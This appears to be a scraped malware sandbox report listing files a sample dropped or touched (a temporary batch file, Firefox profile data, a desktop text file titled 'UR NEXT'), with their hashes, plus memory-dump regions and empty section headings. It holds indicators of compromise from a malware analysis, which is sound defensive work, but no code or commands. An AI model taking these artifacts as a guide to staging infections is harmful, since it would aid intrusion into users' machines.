3047a831ed9c8690b00763061807e98e15e9534ebc9499e3e5abb938199f9716c0e24a83a13291a8fd5b91a6598aeeef377d6793f6461fc0247ec4bbd901a131

Download Submit
C:\Users\Admin\AppData\Local\Temp\windl.bat

Filesize
771B

MD5
a9401e260d9856d1134692759d636e92

SHA1
4141d3c60173741e14f36dfe41588bb2716d2867

SHA256
b551fba71dfd526d4916ae277d8686d83fff36d22fcf6f18457924a070b30ef7

SHA512
5cbe38cdab0283b87d9a9875f7ba6fa4e8a7673d933ca05deddddbcf6cf793bd1bf34ac0add798b4ed59ab483e49f433ce4012f571a658bc0add28dd987a57b6

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\AlternateServices.bin

Filesize
17KB

MD5
7387c16a0e15e648f74e1f7e2ebe96aa

SHA1
662162c6a81845a4949c2e66606905f43420b64b

SHA256
623f5cbf20751f35303e072531049aa962a7b2ca84298c298c599d717a68e679

SHA512
37598e3ffaad2547bb5bc99652397a31f4063b90a5d19f7b7e1d8f184784bde9b5366fbf128ce3c96a53bc75442235c34dc38e570c48353aac2db5bc3a4ee947

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\AlternateServices.bin

Filesize
10KB

MD5
e95487f094a36f58e3d2c313eb071a6a

SHA1
ca6dbf3099f86849fb75ad0484d4abbf5d534365

SHA256
c4b1c4abaa2005fd2542d8b3a106a76d26e5ddb25ae398011814c3afd5bf8301

SHA512
ce9ab80577e5e021480c79d9582f655ce642cbf859a538eaf490806872a425f1d7efa1171ff64b50d1b949598d752d62d60cf04af3ceba25d68a317a0755fa2b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\datareporting\glean\db\data.safe.tmp

Filesize
5KB

MD5
f0ed1d2ab40f309300ea0fde40c12de6

SHA1
c9d5902d2bb9918669c70a4e03a5e2fcb2964b67

SHA256
0342281e0ee6ac8db3f94ad57c90536e4946b6edf2eed803377906fc238132f3

SHA512
8e8163dcda2cadfcb820bef4c011553ef196e789ad761de6854929b7e10af76e77c4b3dd4a172f998fdec25d8d78b4e66b2d41c27270e56481b174c6ead7a874

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\datareporting\glean\db\data.safe.tmp

Filesize
16KB

MD5
f70c23183f1a915f12973745f2887b16

SHA1
6440804a96497756d85c4b8c576ca745c8e8182d

SHA256
483f901917822d96997523c63e596cda331b742073112a1c9af6568f50074274

SHA512
1edb5144b3be0d9ee6ffb8f4ada8a9f5059eb4ce55f3a9757606337aa99747db9457259bca9b0aad9f9b62422aaf23cb0eb6288d34f8ed3759862c8318fbadf5

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\datareporting\glean\pending_pings\3fa469f6-b6fc-4d27-9ee2-833df8e8341c

Filesize
671B

MD5
e93c49b34881f7b042ff9af20028ac57

SHA1
964eec508bafd08d921a70c63ba2f9171209a6bb

SHA256
88f1bbbe400a7e771dbbf6e0d07ecbc7dc8f7a8de751e095c7afc9405aba3092

SHA512
3ee1bad6073c384966bcf08b7856add58026cb0574c5c21273a4f85e7892ef66d46d10a1607f8e2bc7ac9487cb54357a47105c697f22ee56fe75a658f94ba873

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\datareporting\glean\pending_pings\5ee356de-5724-4707-af37-4f26368fbd7f

Filesize
24KB

MD5
c98f994e890cbd1ff448aacad7646786

SHA1
c9d0918cc8c69e95f7dc339b425051dc2c8eb41c

SHA256
697d581e94280ea2a0e6d448657c05cdfa617be882c407a1b53931e96e09ebd8

SHA512
92075ba004b3f4beb64eb4bf7131a3d3eac2a385c8bfa7b854764a7fafe2b3b725741080b7d69d37c154d4dd0dfe877a542c7bdaeb49c79abdba87136953d27f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\datareporting\glean\pending_pings\b9ae1353-305a-4893-9ec4-a11dc8b71b43

Filesize
982B

MD5
3fbf439594e6bdd2c87d8aa08cbbbe61

SHA1
c924ee4b7e06d24a184f13bf8c91b875e0c8fdaa

SHA256
d27a7b6ee71fa520d47197576411d25dc0b62bd68dd57d99cfe33f0b2c929e0a

SHA512
1932d606630f15d0950918b0f6e06290b65a21425f6116bf666b062b5273e576a3c2d6b286f6c21a047a3c4697fc2096b75ba374db40ba33a8043ee7e62b353b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

Filesize
1.1MB

MD5
842039753bf41fa5e11b3a1383061a87

SHA1
3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

SHA256
d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

SHA512
d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

Filesize
116B

MD5
2a461e9eb87fd1955cea740a3444ee7a

SHA1
b10755914c713f5a4677494dbe8a686ed458c3c5

SHA256
4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

SHA512
34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\gmp-widevinecdm\4.10.2710.0\LICENSE.txt.tmp

Filesize
479B

MD5
49ddb419d96dceb9069018535fb2e2fc

SHA1
62aa6fea895a8b68d468a015f6e6ab400d7a7ca6

SHA256
2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539

SHA512
48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

Filesize
372B

MD5
bf957ad58b55f64219ab3f793e374316

SHA1
a11adc9d7f2c28e04d9b35e23b7616d0527118a1

SHA256
bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

SHA512
79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

Filesize
17.8MB

MD5
daf7ef3acccab478aaa7d6dc1c60f865

SHA1
f8246162b97ce4a945feced27b6ea114366ff2ad

SHA256
bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

SHA512
5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\prefs-1.js

Filesize
11KB

MD5
52b66906e4a7a2416795770b76b55698

SHA1
0fdf66ca791319b8fcfbd2a5e24fd8178ecc9927

SHA256
a51d57a54f66bf7edb92e98cc458011269effc0f5ada7cc295341a402bed8b70

SHA512
25afd763d478c1d9ccf8eb07b02cdb54f048eb94179318a73933a06bbb4eefa75c86c44937f12c10b91ad03a9d8a7c945bc38faea4d7eab1b75a349737781b92

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\prefs-1.js

Filesize
11KB

MD5
f100a4f473f1004a5a23f0eeed6696a9

SHA1
f7673682603b163725a576696041488aabafba56

SHA256
8a95ca9df6394ce33cc83ed9cced9cdabfdd16a3b32481461e90ec344979020e

SHA512
6b3920a5a795e7bfb562ba364b226f246065398a9a8a8326c11fc06a7ffc7cd673177925b01e57b92e42b17225a7c13992b29ca816762d5e4066f7cd48eab585

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\prefs-1.js

Filesize
10KB

MD5
5588632c64b5f516e36978b4875219da

SHA1
6081df8e51c175d828dcc9a682e9b1e867a807bd

SHA256
c5857f47653ac470dd0d0f86bb954555c6ff0ebee169e01415b3e0f515dca1bd

SHA512
43e2bde637b9f9d44aca78bcc2b3a98b6eaa4e723af3bdec7a5a1b8ad17b661cabbd0ab1b0c23c09527b45feded7be95bdd476b00661fe3ec2fd6d3e47e28ca1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\prefs.js

Filesize
11KB

MD5
0fc1bc217ea770cbbea146808fd1c43f

SHA1
6efff4a44d407feb75f1f7e8b450cbac52ca04a8

SHA256
86a00c8efc957a776aada1b02e5fa243d27f19841c7e255bdb023b1e8e3659b7

SHA512
9b5831c6284dca1c1c0048632bb4fd839ddc3559e0670ffc5b36b606fd34ea061634366b3572474b6ec0682d7ff6438d0a91a234cf32bd89cbb666a61cb98d58

Download Submit
C:\Users\Admin\Desktop\UR NEXT UR NEXT UR NEXT UR NEXT UR NEXT UR NEXT UR NEXT UR N1XT.txt

Filesize
396B

MD5
9037ebf0a18a1c17537832bc73739109

SHA1
1d951dedfa4c172a1aa1aae096cfb576c1fb1d60

SHA256
38c889b5d7bdcb79bbcb55554c520a9ce74b5bfc29c19d1e4cb1419176c99f48

SHA512
4fb5c06089524c6dcd48b6d165cedb488e9efe2d27613289ef8834dbb6c010632d2bd5e3ac75f83b1d8024477ebdf05b9e0809602bbe1780528947c36e4de32f

Download Submit
memory/220-263-0x00007FF7AA310000-0x00007FF7AA8A7000-memory.dmp

Filesize
5.6MB

Download
memory/672-306-0x0000000000400000-0x0000000002B67000-memory.dmp

Filesize
39.4MB

Download
memory/1008-290-0x00007FF7E96C0000-0x00007FF7E9C57000-memory.dmp

Filesize
5.6MB

Download
memory/1016-1161-0x0000000000400000-0x0000000000448000-memory.dmp

Filesize
288KB

Download
memory/1016-1160-0x0000000000400000-0x0000000000448000-memory.dmp

Filesize
288KB

Download
memory/1108-321-0x0000000005780000-0x00000000057A0000-memory.dmp

Filesize
128KB

Download
memory/1108-318-0x0000000000640000-0x0000000000D70000-memory.dmp

Filesize
7.2MB

Download
memory/1108-1157-0x00000000073E0000-0x00000000073F0000-memory.dmp

Filesize
64KB

Download
memory/1108-1152-0x00000000070F0000-0x0000000007282000-memory.dmp

Filesize
1.6MB

Download
memory/1108-1151-0x0000000007620000-0x0000000007B4C000-memory.dmp

Filesize
5.2MB

Download
memory/1108-1150-0x0000000005D60000-0x0000000005FBC000-memory.dmp

Filesize
2.4MB

Download
memory/1172-291-0x000001EE659E0000-0x000001EE65A00000-memory.dmp

Filesize
128KB

Download
memory/1172-436-0x00007FF7E9000000-0x00007FF7E97EF000-memory.dmp

Filesize
7.9MB

Download
memory/1172-294-0x00007FF7E9000000-0x00007FF7E97EF000-memory.dmp

Filesize
7.9MB

Download
memory/1172-340-0x00007FF7E9000000-0x00007FF7E97EF000-memory.dmp

Filesize
7.9MB

Download
memory/2344-38-0x0000000000400000-0x0000000000460000-memory.dmp

Filesize
384KB

Download
memory/2344-35-0x00000000006C0000-0x0000000000714000-memory.dmp

Filesize
336KB

Download
memory/2396-83-0x000000001BBB0000-0x000000001C0D8000-memory.dmp

Filesize
5.2MB

Download
memory/2396-80-0x00000000024C0000-0x00000000024DC000-memory.dmp

Filesize
112KB

Download
memory/2396-81-0x000000001B010000-0x000000001B060000-memory.dmp

Filesize
320KB

Download
memory/2396-82-0x0000000000B50000-0x0000000000B62000-memory.dmp

Filesize
72KB

Download
memory/2396-79-0x00000000001F0000-0x000000000030A000-memory.dmp

Filesize
1.1MB

Download
memory/2556-393-0x000000000B5D0000-0x000000000B5E0000-memory.dmp

Filesize
64KB

Download
memory/2556-383-0x000000000B5D0000-0x000000000B5E0000-memory.dmp

Filesize
64KB

Download
memory/2556-391-0x000000000B590000-0x000000000B5A0000-memory.dmp

Filesize
64KB

Download
memory/2556-379-0x000000000B440000-0x000000000B44E000-memory.dmp

Filesize
56KB

Download
memory/2556-384-0x000000000B5D0000-0x000000000B5E0000-memory.dmp

Filesize
64KB

Download
memory/2556-395-0x000000000B590000-0x000000000B5A0000-memory.dmp

Filesize
64KB

Download
memory/2556-352-0x00000000002D0000-0x000000000097E000-memory.dmp

Filesize
6.7MB

Download
memory/2556-386-0x000000000B5D0000-0x000000000B5E0000-memory.dmp

Filesize
64KB

Download
memory/2556-394-0x000000000B5D0000-0x000000000B5E0000-memory.dmp

Filesize
64KB

Download
memory/2556-353-0x0000000005970000-0x0000000005F16000-memory.dmp

Filesize
5.6MB

Download
memory/2556-378-0x000000000B470000-0x000000000B4A8000-memory.dmp

Filesize
224KB

Download
memory/2556-385-0x000000000B5D0000-0x000000000B5E0000-memory.dmp

Filesize
64KB

Download
memory/2556-392-0x000000000B590000-0x000000000B5A0000-memory.dmp

Filesize
64KB

Download
memory/3504-101-0x000000001C2C0000-0x000000001C2D2000-memory.dmp

Filesize
72KB

Download
memory/3740-339-0x00007FF75D5E0000-0x00007FF75D609000-memory.dmp

Filesize
164KB

Download
memory/3740-293-0x00007FF75D5E0000-0x00007FF75D609000-memory.dmp

Filesize
164KB

Download
memory/3932-1117-0x00000000003D0000-0x00000000006D0000-memory.dmp

Filesize
3.0MB

Download
memory/3932-833-0x00000000003D0000-0x00000000006D0000-memory.dmp

Filesize
3.0MB

Download
memory/3936-36-0x0000000074B8E000-0x0000000074B8F000-memory.dmp

Filesize
4KB

Download
memory/3936-37-0x0000000074B80000-0x0000000075331000-memory.dmp

Filesize
7.7MB

Download
memory/3936-0-0x0000000074B8E000-0x0000000074B8F000-memory.dmp

Filesize
4KB

Download
memory/3936-2-0x00000000058F0000-0x000000000598C000-memory.dmp

Filesize
624KB

Download
memory/3936-3-0x0000000074B80000-0x0000000075331000-memory.dmp

Filesize
7.7MB

Download
memory/3936-1-0x0000000000FA0000-0x0000000000FA8000-memory.dmp

Filesize
32KB

Download
memory/3936-2182-0x0000000074B80000-0x0000000075331000-memory.dmp

Filesize
7.7MB

Download
memory/4500-2156-0x0000000000400000-0x000000000047D000-memory.dmp

Filesize
500KB

Download
memory/4500-2163-0x0000000000400000-0x000000000047D000-memory.dmp

Filesize
500KB

Download
memory/4680-187-0x000001B6F5E00000-0x000001B6F5E22000-memory.dmp

Filesize
136KB

Download
memory/4756-1602-0x0000000004A20000-0x0000000004A86000-memory.dmp

Filesize
408KB

Download
memory/4756-1603-0x00000000050B0000-0x0000000005114000-memory.dmp

Filesize
400KB

Download
memory/4756-1604-0x0000000005210000-0x00000000052A2000-memory.dmp

Filesize
584KB

Download
memory/5384-2044-0x000002A1E8BE0000-0x000002A1E9B7F000-memory.dmp

Filesize
15.6MB

Download
memory/5384-2045-0x000002A1E8BE0000-0x000002A1E9B7F000-memory.dmp

Filesize
15.6MB

Download
memory/5384-2043-0x000002A1E8BE0000-0x000002A1E9B7F000-memory.dmp

Filesize
15.6MB

Download
memory/5384-2042-0x000002A1E8BE0000-0x000002A1E9B7F000-memory.dmp

Filesize
15.6MB

Download
memory/5384-2041-0x000002A1E8BE0000-0x000002A1E9B7F000-memory.dmp

Filesize
15.6MB

Download
memory/5508-2139-0x0000000000400000-0x0000000000727000-memory.dmp

Filesize
3.2MB

Download
memory/5508-2103-0x0000000000400000-0x0000000000727000-memory.dmp

Filesize
3.2MB

Download
memory/5508-2185-0x0000000000400000-0x0000000000727000-memory.dmp

Filesize
3.2MB

Download
memory/5820-2102-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/5820-2081-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/5956-2147-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Extracted

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads